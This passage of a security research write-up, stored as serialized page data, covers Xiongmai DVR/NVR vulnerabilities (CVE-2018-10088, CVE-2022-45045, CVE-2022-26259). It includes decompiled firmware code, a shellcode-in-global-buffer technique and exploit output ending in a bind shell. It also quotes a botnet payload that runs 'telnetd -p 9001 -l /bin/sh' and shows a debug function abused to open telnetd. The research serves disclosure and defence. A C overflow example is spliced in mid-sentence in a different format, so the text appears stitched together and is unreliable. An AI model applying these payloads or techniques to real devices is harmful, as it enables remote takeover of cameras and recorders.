DAT_00a3c4e4",[1373,116473,4912],{"class":1383},[1373,116475,116476,116478,116480,116483,116485,116487,116490,116492,116494,116496,116498,116500],{"class":1375,"line":4724},[1373,116477,4637],{"class":4636},[1373,116479,4641],{"class":1383},[1373,116481,116482],{"class":4640},"DAT_009806f8 ",[1373,116484,15677],{"class":1397},[1373,116486,4641],{"class":1383},[1373,116488,116489],{"class":4640},"code ",[1373,116491,35613],{"class":1397},[1373,116493,2230],{"class":1383},[1373,116495,95840],{"class":5387},[1373,116497,445],{"class":5467},[1373,116499,2230],{"class":1383},[1373,116501,4765],{"class":1383},[1373,116503,116504,116507,116509,116511,116513,116516,116519,116521,116523,116525,116527,116529,116531,116534,116536,116539],{"class":1375,"line":4756},[1373,116505,116506],{"class":63570},"    DAT_00a3c4a8 ",[1373,116508,5417],{"class":1397},[1373,116510,4641],{"class":1383},[1373,116512,35613],{"class":1397},[1373,116514,116515],{"class":63570},"DAT_009806f8",[1373,116517,116518],{"class":1383},")(",[1373,116520,445],{"class":5467},[1373,116522,5437],{"class":1383},[1373,116524,7218],{"class":1397},[1373,116526,116407],{"class":63570},[1373,116528,5437],{"class":1383},[1373,116530,95840],{"class":5387},[1373,116532,116533],{"class":5467},"2c",[1373,116535,5437],{"class":1383},[1373,116537,116538],{"class":63570},"DAT_00a3c504",[1373,116540,4680],{"class":1383},[1373,116542,116543],{"class":1375,"line":4768},[1373,116544,1855],{"class":1383},[1373,116546,116547,116549,116551,116554,116556,116558,116560],{"class":1375,"line":4792},[1373,116548,4637],{"class":4636},[1373,116550,4641],{"class":1383},[1373,116552,116553],{"class":4640},"DAT_00a3c4a8 
",[1373,116555,15920],{"class":1397},[1373,116557,5557],{"class":5467},[1373,116559,2230],{"class":1383},[1373,116561,4765],{"class":1383},[1373,116563,116564,116567,116569,116572,116574,116576,116579,116581,116583,116585,116588,116590,116592,116594,116597,116599],{"class":1375,"line":4798},[1373,116565,116566],{"class":7297},"    sprintf",[1373,116568,1384],{"class":1383},[1373,116570,116571],{"class":63570},"local_140",[1373,116573,5437],{"class":1383},[1373,116575,183],{"class":1387},[1373,116577,116578],{"class":37971},"%s%s",[1373,116580,183],{"class":1387},[1373,116582,5437],{"class":1383},[1373,116584,183],{"class":1387},[1373,116586,116587],{"class":1391},"\u002Fmnt",[1373,116589,183],{"class":1387},[1373,116591,5437],{"class":1383},[1373,116593,183],{"class":1387},[1373,116595,116596],{"class":1391},"\u002FDVR",[1373,116598,183],{"class":1387},[1373,116600,4680],{"class":1383},[1373,116602,116603,116606,116608,116611,116613,116615,116617,116619],{"class":1375,"line":4806},[1373,116604,116605],{"class":7297},"    
FUN_004193dc",[1373,116607,1384],{"class":1383},[1373,116609,116610],{"class":63570},"param_1",[1373,116612,5437],{"class":1383},[1373,116614,116571],{"class":63570},[1373,116616,5437],{"class":1383},[1373,116618,445],{"class":5467},[1373,116620,4680],{"class":1383},[1373,116622,116623,116625,116627],{"class":1375,"line":4817},[1373,116624,7340],{"class":4636},[1373,116626,5557],{"class":5467},[1373,116628,4912],{"class":1383},[1373,116630,116631],{"class":1375,"line":4825},[1373,116632,1855],{"class":1383},[1373,116634,116635,116637,116639,116641,116643,116645,116647,116649,116651,116653,116655,116657,116659,116661,116664,116666],{"class":1375,"line":4835},[1373,116636,39226],{"class":7297},[1373,116638,1384],{"class":1383},[1373,116640,116571],{"class":4640},[1373,116642,5437],{"class":1383},[1373,116644,183],{"class":1387},[1373,116646,116578],{"class":37971},[1373,116648,183],{"class":1387},[1373,116650,5437],{"class":1383},[1373,116652,183],{"class":1387},[1373,116654,116587],{"class":1391},[1373,116656,183],{"class":1387},[1373,116658,5437],{"class":1383},[1373,116660,183],{"class":1387},[1373,116662,116663],{"class":1391},"\u002Ffailed.htm",[1373,116665,183],{"class":1387},[1373,116667,4680],{"class":1383},[18,116669,116670,116671,116674],{},"An overly long username (or password) will eventually gain control over ",[886,116672,116673],{},"pc"," by overwriting a function pointer. Unfortunately for the attacker, they don’t really have control over any of the other registers. Additionally, since the stack and heap bases are randomized, you can’t easily stash shellcode there without some type of address leak. Guessing addresses is no good either because if the system crashes you’ll have to wait 2 minutes for it to reboot. 
Not exactly ideal.",[18,116676,116677,116678,116681,116682,116687,116688,116692,116693,116696],{},"For ",[47,116679,81785],{"href":115748,"rel":116680},[51],", a similar Xiongmai HTTP buffer overflow vulnerability, ",[47,116683,116686],{"href":116684,"rel":116685},"https:\u002F\u002Fgithub.com\u002Ftothi",[51],"tothi"," wrote an ",[47,116689,22852],{"href":116690,"rel":116691},"https:\u002F\u002Fgithub.com\u002Ftothi\u002Fpwn-hisilicon-dvr\u002Fblob\u002F42d8325e68fdb075fe27df8a269932f9fa9601a6\u002Fpwn_hisilicon_dvr.py#L266",[51]," that tried to solve this problem by leveraging CVE-2017-7577 to download Sofia’s ",[886,116694,116695],{},"\u002Fproc\u002Fpid\u002Fmaps"," to acquire the stack base address and then guessing the offset of the shellcode.",[18,116698,116699],{},"We took a different approach. CVE-2018-10088 overflows a global buffer that resides at a predictable address within Sofia’s data segment. Code execution can be achieved by writing shellcode to the overflowed password buffer, followed by overwriting the function pointer with the password buffer’s predictable address. When Sofia uses the overwritten function pointer, it’ll jump into the password buffer and execute our shellcode. The space is kind of tight (especially since Thumb isn’t supported on all devices), but doable.",[18,116701,116702],{},"Excluding a few overly technical issues, the only challenges with exploitation are dealing with the instruction cache (which we’re able to work around easily), and knowing what the password buffer’s address is across different versions. Of course, like tothi, we can solve the password buffer address issue by downloading Sofia from the target using CVE-2017-7577. Or we can just guess all known addresses. 
Waiting two minutes for a reboot isn’t too bad, right?",[18,116704,116705],{},"Here’s sample output from our exploit:",[1354,116707,116710],{"className":116708,"code":116709,"language":1359},[1357],"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2018-10088$ .\u002Fbuild\u002Fcve-2018-10088-linux_arm64 -v -c -e -rhost 10.12.70.210 -bport 1270\n[+] Validating the remote target is a Xiongmai NVR\u002FIPC installation\n[+] Target validation succeeded!\n[+] Running a version check on the remote target\n[!] The target *might* be a vulnerable version. Continuing.\n[+] Sending a bind shell for port 1270\n[+] Using CVE-2017-7577 to download Sofia to fingerprint the version...\n[+] Using Sofia hash fc65ed752bd2efb8b57c638aae0960e0\n[+] Seeding the remote target with the exploit shell code\n[+] Triggering payload!\n[+] Connected to 10.12.70.210:1270!\n\nBusyBox v1.16.1 (2016-03-31 20:15:25 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n$ cat \u002Fproc\u002Fversion\ncat \u002Fproc\u002Fversion\nLinux version 3.0.8 (leixinyuan@localhost.localdomain) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #52 Fri Apr 22 12:33:57 CST 2016\n$\n",[886,116711,116709],{"__ignoreMap":219},[18,116713,116714,116715,116718,116719,116721,116722,116724,116725,116730],{},"Despite public reports, I somewhat doubt CVE-2018-10088 has been used in the wild. I think CVE-2018-10088 has gotten confused with tothi’s ",[886,116716,116717],{},"pwn_hisilicon_dvr.py",". The two vulnerabilities are not the same. CVE-2018-10088 is an overflow when ",[886,116720,116400],{}," uses a long username or password during a login attempt. Tothi’s vulnerability is an overflow when ",[886,116723,39226],{}," uses an overly long request URI. 
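To make the distinction concrete, here is an added example, written for this post rather than taken from Sofia or from VulnCheck’s exploit, that models the CVE-2018-10088 sink in C: the decompiled handler’s strtok-then-strcpy login parsing next to a bounded version, operating on a global struct whose layout (32-byte credential buffers followed by a function pointer) and whose default_auth callback are assumptions chosen for illustration. The real Sofia buffer sizes and offsets are not on the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CRED_MAX 32   /* assumed buffer size; Sofia's real sizes are not on the page */

/* Assumed layout: the overflowed credential buffers sit in front of a function
 * pointer in the same writable data segment, mirroring the write-up's description. */
struct login_state {
    char username[CRED_MAX];
    char password[CRED_MAX];
    int (*auth_cb)(const char *user, const char *pass);
};

/* Stand-in for the authentication callback; accepts the factory default
 * admin with an empty password that the post mentions. */
static int default_auth(const char *user, const char *pass)
{
    return strcmp(user, "admin") == 0 && pass[0] == '\0';
}

/* Non-PIE global: &g_login is a fixed address readable straight out of the
 * binary, which is what makes "jump into the password buffer" workable. */
struct login_state g_login = { "", "", default_auth };

/* Tokenize "command=login&username=U&password=P" the way the decompiled handler
 * does: strtok(NULL, "&") per field, +9 to skip "username=" / "password=".
 * Returns the two value pointers, or -1 if the body is not that shape. body is modified. */
static int split_login(char *body, char **user, char **pass)
{
    char *tok = strtok(body, "&");
    if (!tok || strcmp(tok, "command=login") != 0) return -1;
    tok = strtok(NULL, "&");
    if (!tok || strncmp(tok, "username=", 9) != 0) return -1;
    *user = tok + 9;
    tok = strtok(NULL, "&");
    if (!tok || strncmp(tok, "password=", 9) != 0) return -1;
    *pass = tok + 9;
    return 0;
}

/* 2016 pattern (CVE-2018-10088): unbounded copies into the globals. A value of
 * CRED_MAX bytes or more runs into the next field and, further on, into auth_cb.
 * Only ever called with in-bounds input in this example. */
static int parse_login_unbounded(char *body, struct login_state *st)
{
    char *u, *p;
    if (split_login(body, &u, &p) != 0) return -1;
    strcpy(st->username, u);
    strcpy(st->password, p);
    return 0;
}

/* Hardened pattern: measure first, reject anything that will not fit with its
 * terminator, then copy exactly that many bytes. Rejecting rather than
 * truncating avoids silently authenticating a different credential. */
static int parse_login_bounded(char *body, struct login_state *st)
{
    char *u, *p;
    if (split_login(body, &u, &p) != 0) return -1;
    size_t ul = strlen(u), pl = strlen(p);
    if (ul >= sizeof st->username || pl >= sizeof st->password) return -2;
    memcpy(st->username, u, ul + 1);
    memcpy(st->password, p, pl + 1);
    return 0;
}

/* Bytes the username copy must overrun before it reaches the function pointer
 * in this assumed layout: both credential buffers. */
size_t overrun_to_auth_cb(void)
{
    return offsetof(struct login_state, auth_cb) - offsetof(struct login_state, username);
}

/* Run one request body through a parser on a fresh state. Returns the parser's
 * error (-1 malformed, -2 over-long, -3 body too big) or the callback's verdict. */
int handle_login(const char *request_body, int bounded)
{
    char body[512];
    struct login_state st = { "", "", default_auth };
    size_t n = strlen(request_body);
    if (n >= sizeof body) return -3;
    memcpy(body, request_body, n + 1);
    int rc = bounded ? parse_login_bounded(body, &st) : parse_login_unbounded(body, &st);
    if (rc != 0) return rc;
    return st.auth_cb(st.username, st.password);
}

/* Build a login with an n-byte username of 'A's and run it through the bounded parser. */
int login_with_username_of_len(size_t n)
{
    char body[512];
    if (n > 400) return -3;
    memcpy(body, "command=login&username=", 23);
    memset(body + 23, 'A', n);
    strcpy(body + 23 + n, "&password=");
    return handle_login(body, 1);
}

int main(void)
{
    char body[] = "command=login&username=admin&password=";
    if (parse_login_bounded(body, &g_login) == 0)
        printf("g_login at %p: user=\"%s\" pass=\"%s\" -> auth=%d\n", (void *)&g_login,
               g_login.username, g_login.password, g_login.auth_cb(g_login.username, g_login.password));
    printf("username copy must overrun %zu bytes to reach auth_cb\n", overrun_to_auth_cb());
    printf("31-byte username: %d, 32-byte username: %d\n",
           login_with_username_of_len(31), login_with_username_of_len(32));
    return 0;
}
```

The bounded parser returns -2 at exactly the length where the unbounded one would start writing past username, and overrun_to_auth_cb() is the distance an attacker would have to cover in this layout before the callback is reachable. Paired with a fixed &g_login, that is the whole reason the write-up can park shellcode in the password buffer and point the overwritten callback back at it; the same arithmetic with Sofia’s real offsets is what has to be redone per firmware version.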
CVE-2018-10088 has no public RCE exploit, and tothi’s exploit was published with an ",[47,116726,116729],{"href":116727,"rel":116728},"https:\u002F\u002Fgithub.com\u002Ftothi\u002Fpwn-hisilicon-dvr\u002Ftree\u002F42d8325e68fdb075fe27df8a269932f9fa9601a6",[51],"extensive writeup",". It seems more likely that botnet operators, instead of doing their own exploit development work, adapted tothi’s exploit. The confusion, I believe, lies in the fact that tothi’s vulnerability never had an assigned CVE (and the poor description of CVE-2018-10088). In an attempt to clarify that tothi’s vulnerability is not CVE-2018-10088, we asked MITRE to assign tothi’s vulnerability a CVE and they assigned CVE-2022-45460.",[18,116732,116733,116734,1246,116739,1246,116744,1255,116749,59],{},"We also got MITRE to assign CVE-2022-45045. This vulnerability is an arbitrary operating system command execution vulnerability on the port 34567 interface. In November 2022, we caught the vulnerability being exploited in our honeypots. 
We’ve seen the issue exploited by ",[47,116735,116738],{"href":116736,"rel":116737},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F85.31.44.178",[51],"85.31.44.178",[47,116740,116743],{"href":116741,"rel":116742},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F92.118.39.78",[51],"92.118.39.78",[47,116745,116748],{"href":116746,"rel":116747},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F193.47.61.60",[51],"193.47.61.60",[47,116750,116753],{"href":116751,"rel":116752},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F195.154.36.148",[51],"195.154.36.148",[18,116755,116756],{},[68,116757],{":width":10862,"alt":116758,"src":116759},"honeypot_pcap","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Fhoneypot_pcap.png",[18,116761,116762,116763,982,116767,116772],{},"Other security vendors have reported seeing the same exploit in ",[47,116764,116766],{"href":106224,"rel":116765},[51],"2019",[47,116768,116771],{"href":116769,"rel":116770},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Fmalware-hosting-domain-cyberium-fanning-out-mirai-variants",[51],"2021",". In fact, the payload embedded in the Wireshark screenshot above (from our honeypot) is exactly the same as the version Netlab 360 described in 2019. 
Here it is decompressed:",[1354,116774,116777],{"className":116775,"code":116776,"language":1359},[1357],"{\n  \"UpgradeCommand\": [\n    {\n      \"Command\": \"Shell\",\n      \"Script\": \"telnetd -p 9001 -l \u002Fbin\u002Fsh\"\n    },\n    {\n      \"Command\": \"Shell\",\n      \"Script\": \"busybox telnetd -p 9001 -l \u002Fbin\u002Fsh\"\n    },\n    {\n      \"Command\": \"Shell\",\n      \"Script\": \"sleep 259200\"\n    },\n    {\n      \"Command\": \"Shell\",\n      \"Script\": \"busybox sleep 259200\"\n    }\n  ],\n  \"Hardware\": \"SkipCheck\",\n  \"SupportFlashType\": [\n    {\n      \"FlashID\": \"SkipCheck\"\n    }\n  ],\n  \"DevID\": \"SkipCheck\",\n  \"Vendor\": \"SkipCheck\",\n  \"CompatibleVersion\": -1,\n  \"CRC\": \"SkipCheck\"\n}\n",[886,116778,116776],{"__ignoreMap":219},[18,116780,116781,116782,116784],{},"Each of the commands will be executed during an “upgrade”, although no upgrade filesystems are actually provided. The exploit opens ",[886,116783,1055],{}," on port 9001 which allows the attacker to begin a stage 2. Additionally, the exploit issues sleep commands to prevent the system from rebooting after the “upgrade” is finished. The sleep commands have the added benefit of locking down port 34567 and preventing any other attacker from exploiting the device as long as the sleep is active.",[18,116786,116787,116788,116792],{},"CVE-2022-45045 is exploited using a custom protocol on port 34567. An attacker must be authenticated to successfully execute the “upgrade” command. However, authentication is often not difficult because Xiongmai devices use default credentials (admin:) or the credentials can be leaked using CVE-2017-7577. 
A surprising number of devices remain vulnerable to CVE-2017-7577 and, although they don’t have a tag for it, we can see on ",[47,116789,86601],{"href":116790,"rel":116791},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=raw_data.web.paths%3A%22%2F..%2F..%2F..%2F..%2F..%2Fmnt%2Fmtd%2FConfig%2FAccount1%22",[51]," that attackers are actively looking to leak credentials from these devices.",[18,116794,116795],{},"CVE-2022-45045 is particularly interesting because, as we saw in an earlier section, this interface has been available from 2016 through current firmware versions. But it’s difficult to estimate the number of potentially affected internet-facing devices because neither Censys nor Shodan appears to identify the port, perhaps because it requires a custom protocol. Without running our own internet scanner, it’s difficult to say how many affected internet-facing systems there are. I would guess there are a fair number, but that remains a guess.",[18,116797,116798,116799,59],{},"Xiongmai did make changes to the upgrade logic to prevent this specific attack sometime in 2020. 
Besides requiring the filesystem files to be present and adding a (poorly enforced) digital signature, they also started ignoring commands containing ",[886,116800,1055],{},[1354,116802,116804],{"className":92494,"code":116803,"language":28578,"meta":219,"style":219},"json_obj_Value(uVar4,\"Script\");\npcVar7 = (char *)json_value_as_string();\npcVar7 = strstr(pcVar7,\"telnetd\");\nif (pcVar7 == (char *)0x0) {\n    uVar4 = FUN_00517e88(uVar3,uVar22);\n    uVar4 = json_obj_Value(uVar4,\"Script\");\n    json_asString(auStack6252,uVar4);\n    uVar12 = local_1868;\n    std::__cxx11::basic_string\u003Cchar,std::char_traits\u003Cchar>,std::allocator\u003Cchar>>::_M_dispose();\n    if (uVar12 \u003C 100) {\n        uVar4 = FUN_00517e88(uVar3,uVar22);\n        json_obj_Value(uVar4,\"Script\");\n        pcVar7 = (char *)json_value_as_string();\n        system(pcVar7);\n    }\n",[886,116805,116806,116827,116848,116872,116898,116920,116943,116959,116971,117007,117024,117043,117062,117081,117092],{"__ignoreMap":219},[1373,116807,116808,116811,116813,116816,116818,116820,116823,116825],{"class":1375,"line":1376},[1373,116809,116810],{"class":7297},"json_obj_Value",[1373,116812,1384],{"class":1383},[1373,116814,116815],{"class":4640},"uVar4",[1373,116817,5437],{"class":1383},[1373,116819,183],{"class":1387},[1373,116821,116822],{"class":1391},"Script",[1373,116824,183],{"class":1387},[1373,116826,4680],{"class":1383},[1373,116828,116829,116832,116834,116836,116839,116841,116843,116846],{"class":1375,"line":220},[1373,116830,116831],{"class":4640},"pcVar7 
",[1373,116833,5417],{"class":1397},[1373,116835,4641],{"class":1383},[1373,116837,116838],{"class":7293},"char",[1373,116840,19113],{"class":1397},[1373,116842,2230],{"class":1383},[1373,116844,116845],{"class":7297},"json_value_as_string",[1373,116847,15603],{"class":1383},[1373,116849,116850,116852,116854,116857,116859,116862,116864,116866,116868,116870],{"class":1375,"line":1266},[1373,116851,116831],{"class":4640},[1373,116853,5417],{"class":1397},[1373,116855,116856],{"class":7297}," strstr",[1373,116858,1384],{"class":1383},[1373,116860,116861],{"class":4640},"pcVar7",[1373,116863,5437],{"class":1383},[1373,116865,183],{"class":1387},[1373,116867,1055],{"class":1391},[1373,116869,183],{"class":1387},[1373,116871,4680],{"class":1383},[1373,116873,116874,116876,116878,116880,116882,116884,116886,116888,116890,116892,116894,116896],{"class":1375,"line":1852},[1373,116875,4637],{"class":4636},[1373,116877,4641],{"class":1383},[1373,116879,116831],{"class":4640},[1373,116881,15920],{"class":1397},[1373,116883,4641],{"class":1383},[1373,116885,116838],{"class":7293},[1373,116887,19113],{"class":1397},[1373,116889,2230],{"class":1383},[1373,116891,95840],{"class":5387},[1373,116893,445],{"class":5467},[1373,116895,2230],{"class":1383},[1373,116897,4765],{"class":1383},[1373,116899,116900,116903,116905,116908,116910,116913,116915,116918],{"class":1375,"line":4692},[1373,116901,116902],{"class":63570},"    uVar4 ",[1373,116904,5417],{"class":1397},[1373,116906,116907],{"class":7297}," FUN_00517e88",[1373,116909,1384],{"class":1383},[1373,116911,116912],{"class":63570},"uVar3",[1373,116914,5437],{"class":1383},[1373,116916,116917],{"class":63570},"uVar22",[1373,116919,4680],{"class":1383},[1373,116921,116922,116924,116926,116929,116931,116933,116935,116937,116939,116941],{"class":1375,"line":4724},[1373,116923,116902],{"class":63570},[1373,116925,5417],{"class":1397},[1373,116927,116928],{"class":7297}," 
json_obj_Value",[1373,116930,1384],{"class":1383},[1373,116932,116815],{"class":63570},[1373,116934,5437],{"class":1383},[1373,116936,183],{"class":1387},[1373,116938,116822],{"class":1391},[1373,116940,183],{"class":1387},[1373,116942,4680],{"class":1383},[1373,116944,116945,116948,116950,116953,116955,116957],{"class":1375,"line":4756},[1373,116946,116947],{"class":7297},"    json_asString",[1373,116949,1384],{"class":1383},[1373,116951,116952],{"class":63570},"auStack6252",[1373,116954,5437],{"class":1383},[1373,116956,116815],{"class":63570},[1373,116958,4680],{"class":1383},[1373,116960,116961,116964,116966,116969],{"class":1375,"line":4768},[1373,116962,116963],{"class":63570},"    uVar12 ",[1373,116965,5417],{"class":1397},[1373,116967,116968],{"class":63570}," local_1868",[1373,116970,4912],{"class":1383},[1373,116972,116973,116976,116978,116980,116982,116985,116987,116989,116991,116993,116996,116998,117000,117002,117005],{"class":1375,"line":4792},[1373,116974,116975],{"class":63570},"    std::__cxx11::basic_string",[1373,116977,11852],{"class":1397},[1373,116979,116838],{"class":7293},[1373,116981,5437],{"class":1383},[1373,116983,116984],{"class":63570},"std::char_traits",[1373,116986,11852],{"class":1397},[1373,116988,116838],{"class":7293},[1373,116990,5384],{"class":1397},[1373,116992,5437],{"class":1383},[1373,116994,116995],{"class":63570},"std::allocator",[1373,116997,11852],{"class":1397},[1373,116999,116838],{"class":7293},[1373,117001,15038],{"class":1397},[1373,117003,117004],{"class":7297},"::_M_dispose",[1373,117006,15603],{"class":1383},[1373,117008,117009,117011,117013,117016,117018,117020,117022],{"class":1375,"line":4798},[1373,117010,4695],{"class":4636},[1373,117012,4641],{"class":1383},[1373,117014,117015],{"class":63570},"uVar12 
",[1373,117017,11852],{"class":1397},[1373,117019,52027],{"class":5467},[1373,117021,2230],{"class":1383},[1373,117023,4765],{"class":1383},[1373,117025,117026,117029,117031,117033,117035,117037,117039,117041],{"class":1375,"line":4806},[1373,117027,117028],{"class":63570},"        uVar4 ",[1373,117030,5417],{"class":1397},[1373,117032,116907],{"class":7297},[1373,117034,1384],{"class":1383},[1373,117036,116912],{"class":63570},[1373,117038,5437],{"class":1383},[1373,117040,116917],{"class":63570},[1373,117042,4680],{"class":1383},[1373,117044,117045,117048,117050,117052,117054,117056,117058,117060],{"class":1375,"line":4817},[1373,117046,117047],{"class":7297},"        json_obj_Value",[1373,117049,1384],{"class":1383},[1373,117051,116815],{"class":63570},[1373,117053,5437],{"class":1383},[1373,117055,183],{"class":1387},[1373,117057,116822],{"class":1391},[1373,117059,183],{"class":1387},[1373,117061,4680],{"class":1383},[1373,117063,117064,117067,117069,117071,117073,117075,117077,117079],{"class":1375,"line":4825},[1373,117065,117066],{"class":63570},"        pcVar7 ",[1373,117068,5417],{"class":1397},[1373,117070,4641],{"class":1383},[1373,117072,116838],{"class":7293},[1373,117074,19113],{"class":1397},[1373,117076,2230],{"class":1383},[1373,117078,116845],{"class":7297},[1373,117080,15603],{"class":1383},[1373,117082,117083,117086,117088,117090],{"class":1375,"line":4835},[1373,117084,117085],{"class":7297},"        system",[1373,117087,1384],{"class":1383},[1373,117089,116861],{"class":63570},[1373,117091,4680],{"class":1383},[1373,117093,117094],{"class":1375,"line":4843},[1373,117095,4795],{"class":1383},[18,117097,117098],{},"While this issue is mitigated in newer versions of Xiongmai firmware, there remain a lot of affected devices on the internet, which is somewhat surprising given years of exploitation by at least one botnet (Moobot). 
Of course, newer firmware isn’t entirely immune to exploitation either.",[61,117100,117102],{"id":117101},"cve-2022-26259-rtsp-exploitation","CVE-2022-26259: RTSP Exploitation",[18,117104,117105,117106,117109,117110,117114],{},"CVE-2022-26259 is a newer Xiongmai vulnerability that was found by Chris Leech. The vulnerability details were ",[47,117107,22232],{"href":81975,"rel":117108},[51]," in early 2022. The vulnerability is a stack-based buffer overflow affecting RTSP parsing on port 554. VulnCheck has successfully exploited this vulnerability for RCE on all of our Xiongmai test devices. Xiongmai issued a ",[47,117111,20035],{"href":117112,"rel":117113},"https:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002Findex.php\u002Fservice\u002Fnotice_info\u002F51\u002F2",[51]," for this issue, but, curiously, the Sunba we purchased from Amazon isn’t listed as an affected device and doesn’t have a fix in the most up-to-date firmware despite being very exploitable.",[18,117116,117117],{},"Xiongmai devices have a fairly distinct RTSP banner, so we can see there are more than 100,000 of these endpoints on the internet.",[18,117119,117120],{},[68,117121],{":width":10862,"alt":117122,"src":117123},"rtsp_shodan","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Frtsp_shodan.png",[18,117125,117126,117127,22771,117130,117133,117134,117136],{},"The restrictions on the overflow payload are typical, albeit somewhat strict. No null bytes. No space characters. Leech found the perfect ROP gadget in his test firmware. The gadget rotated an attacker-provided string on the stack from ",[886,117128,117129],{},"r9",[886,117131,117132],{},"r0","and then called ",[886,117135,99953],{},". Unfortunately, this primitive doesn’t exist in all firmware versions. Older firmware that doesn’t have this gadget can easily execute out of global buffers as discussed in the CVE-2018-10088 section. 
But newer firmware prevents data execution, so without Leech’s gadget being present, things get a little tough.",[18,117138,117139,117140,22771,117142,117144,117145,117147],{},"Not to say there is no solution. For example, our new Sunba using V4.03R11.C6380202 doesn’t have the ",[886,117141,117129],{},[886,117143,117132],{}," primitive, but it does have the following debug code that will pop open ",[886,117146,1055],{},". The debug function takes no parameters, so all we have to do is jump there.",[1354,117149,117151],{"className":92494,"code":117150,"language":28578,"meta":219,"style":219},"undefined4 UndefinedFunction_003f187c(void)\n{\n    FILE *__stream;\n    int *piVar1;\n    char *pcVar2;\n    undefined4 uVar3;\n\n    memcpy(&stack0x0000000c,\"telnetd\",8);\n    sprintf(&stack0x00000018,\"%s %X\",&stack0x0000000c);\n    __stream = popen(&stack0x00000018,\"r\");\n    if (__stream == (FILE *)0x0) {\n        piVar1 = __errno_location();\n        pcVar2 = strerror(*piVar1);\n        printf(\"\\x1b[34mDebug R: Open Failed: %s!\\n\\x1b[0m\",pcVar2);\n        uVar3 = 0xffffffff;\n    }\n    else {\n        pclose(__stream);\n        FUN_003f1588();\n        uVar3 = 0;\n    }\n    return uVar3;\n}\n",[886,117152,117153,117168,117172,117184,117196,117208,117215,117219,117245,117275,117301,117329,117341,117359,117392,117407,117411,117417,117428,117435,117445,117449,117458],{"__ignoreMap":219},[1373,117154,117155,117158,117161,117163,117166],{"class":1375,"line":1376},[1373,117156,117157],{"class":4640},"undefined4 ",[1373,117159,117160],{"class":7297},"UndefinedFunction_003f187c",[1373,117162,1384],{"class":1383},[1373,117164,117165],{"class":7293},"void",[1373,117167,11875],{"class":1383},[1373,117169,117170],{"class":1375,"line":220},[1373,117171,8904],{"class":1383},[1373,117173,117174,117177,117179,117182],{"class":1375,"line":1266},[1373,117175,117176],{"class":63570},"    FILE 
",[1373,117178,35613],{"class":1397},[1373,117180,117181],{"class":63570},"__stream",[1373,117183,4912],{"class":1383},[1373,117185,117186,117189,117191,117194],{"class":1375,"line":1852},[1373,117187,117188],{"class":7293},"    int",[1373,117190,19113],{"class":1397},[1373,117192,117193],{"class":63570},"piVar1",[1373,117195,4912],{"class":1383},[1373,117197,117198,117201,117203,117206],{"class":1375,"line":4692},[1373,117199,117200],{"class":7293},"    char",[1373,117202,19113],{"class":1397},[1373,117204,117205],{"class":63570},"pcVar2",[1373,117207,4912],{"class":1383},[1373,117209,117210,117213],{"class":1375,"line":4724},[1373,117211,117212],{"class":63570},"    undefined4 uVar3",[1373,117214,4912],{"class":1383},[1373,117216,117217],{"class":1375,"line":4756},[1373,117218,6520],{"emptyLinePlaceholder":237},[1373,117220,117221,117224,117226,117228,117231,117233,117235,117237,117239,117241,117243],{"class":1375,"line":4768},[1373,117222,117223],{"class":7297},"    memcpy",[1373,117225,1384],{"class":1383},[1373,117227,7218],{"class":1397},[1373,117229,117230],{"class":63570},"stack0x0000000c",[1373,117232,5437],{"class":1383},[1373,117234,183],{"class":1387},[1373,117236,1055],{"class":1391},[1373,117238,183],{"class":1387},[1373,117240,5437],{"class":1383},[1373,117242,37681],{"class":5467},[1373,117244,4680],{"class":1383},[1373,117246,117247,117249,117251,117253,117256,117258,117260,117262,117265,117267,117269,117271,117273],{"class":1375,"line":4792},[1373,117248,116566],{"class":7297},[1373,117250,1384],{"class":1383},[1373,117252,7218],{"class":1397},[1373,117254,117255],{"class":63570},"stack0x00000018",[1373,117257,5437],{"class":1383},[1373,117259,183],{"class":1387},[1373,117261,38048],{"class":37971},[1373,117263,117264],{"class":37971}," 
%X",[1373,117266,183],{"class":1387},[1373,117268,5437],{"class":1383},[1373,117270,7218],{"class":1397},[1373,117272,117230],{"class":63570},[1373,117274,4680],{"class":1383},[1373,117276,117277,117280,117282,117285,117287,117289,117291,117293,117295,117297,117299],{"class":1375,"line":4798},[1373,117278,117279],{"class":63570},"    __stream ",[1373,117281,5417],{"class":1397},[1373,117283,117284],{"class":7297}," popen",[1373,117286,1384],{"class":1383},[1373,117288,7218],{"class":1397},[1373,117290,117255],{"class":63570},[1373,117292,5437],{"class":1383},[1373,117294,183],{"class":1387},[1373,117296,11872],{"class":1391},[1373,117298,183],{"class":1387},[1373,117300,4680],{"class":1383},[1373,117302,117303,117305,117307,117310,117312,117314,117317,117319,117321,117323,117325,117327],{"class":1375,"line":4806},[1373,117304,4695],{"class":4636},[1373,117306,4641],{"class":1383},[1373,117308,117309],{"class":63570},"__stream ",[1373,117311,15920],{"class":1397},[1373,117313,4641],{"class":1383},[1373,117315,117316],{"class":63570},"FILE ",[1373,117318,35613],{"class":1397},[1373,117320,2230],{"class":1383},[1373,117322,95840],{"class":5387},[1373,117324,445],{"class":5467},[1373,117326,2230],{"class":1383},[1373,117328,4765],{"class":1383},[1373,117330,117331,117334,117336,117339],{"class":1375,"line":4817},[1373,117332,117333],{"class":63570},"        piVar1 ",[1373,117335,5417],{"class":1397},[1373,117337,117338],{"class":7297}," __errno_location",[1373,117340,15603],{"class":1383},[1373,117342,117343,117346,117348,117351,117353,117355,117357],{"class":1375,"line":4825},[1373,117344,117345],{"class":63570},"        pcVar2 ",[1373,117347,5417],{"class":1397},[1373,117349,117350],{"class":7297}," 
